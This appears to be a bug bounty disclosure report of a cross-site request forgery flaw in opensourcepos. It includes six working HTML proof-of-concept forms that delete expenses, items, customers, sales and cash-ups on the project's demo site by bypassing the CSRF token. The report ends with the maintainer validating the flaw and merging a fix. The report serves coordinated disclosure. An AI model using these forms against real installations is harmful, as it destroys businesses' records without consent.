Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Sep 28th 2021


Description

in some delete actions I change the HTTP request method to GET and Also remove the CSRF token from request and then I able to Bypass your CSRF protection.

Occurences

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/expenses/delete">
      <input type="hidden" name="ids&#91;&#93;" value="1" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any Expenses with ids[] 1 and can be increased with any more id.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/items/delete">
      <input type="hidden" name="ids&#91;&#93;" value="37" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete item with ids[] 37 and also more.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/expenses_categories/delete">
      <input type="hidden" name="ids&#91;&#93;" value="2" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any expenses categories with ids[] 2 and any more id.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/customers/delete">
      <input type="hidden" name="ids&#91;&#93;" value="7" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any Customers with ids[] 7 and can be increased with any more id.

For delete Sales You don't have any CSRF protection

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/sales/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete sale with id 1

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/cashups/delete">
      <input type="hidden" name="ids&#91;&#93;" value="1" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any Cash Ups with ids[] 1 and can be increased with any more id.

We have contacted a member of the opensourcepos team and are waiting to hear back a month ago
We have contacted a member of the opensourcepos team and are waiting to hear back a month ago
amammad modified their report
a month ago
opensourcepos/opensourcepos maintainer validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on ea879f a month ago
jekkos has been awarded the fix bounty
Sales.php#L1-L1569 has been validated
Expenses.php#L1-L183 has been validated
Items.php#L1-L1227 has been validated
Customers.php#L1-L465 has been validated
Cashups.php#L1-L246 has been validated
jekkos
a month ago

Hi, I have deployed a fix on dev.opensourcepos.org now.. The app now blocks GET requests for the methods you have enumerated here

0x9x
a month ago

Nice find !